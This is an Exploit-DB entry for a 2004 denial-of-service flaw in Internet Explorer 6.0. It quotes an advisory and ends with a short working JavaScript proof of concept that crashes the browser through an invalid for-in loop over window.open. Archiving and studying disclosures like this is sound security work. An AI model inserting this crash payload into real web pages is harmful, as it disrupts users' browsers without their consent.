Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service Vulnerability

2004-07-12T00:00:00
ID EDB-ID:24267
Type exploitdb
Reporter Berend-Jan Wever
Modified 2004-07-12T00:00:00

Description

Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial Of Service Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/10694/info

A denial of service vulnerability is reported to affect Internet Explorer. The issue is reported to present itself when Internet Explorer attempts to render JavaScript that contains an invalid for statement.

A remote attacker may exploit this vulnerability to cause the running instance of Internet Explorer to crash.

This vulnerability is reported to affect Internet Explorer version 6.0 (SP1), other versions might also be affected.

<SCRIPT language="javascript">

MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }

</SCRIPT>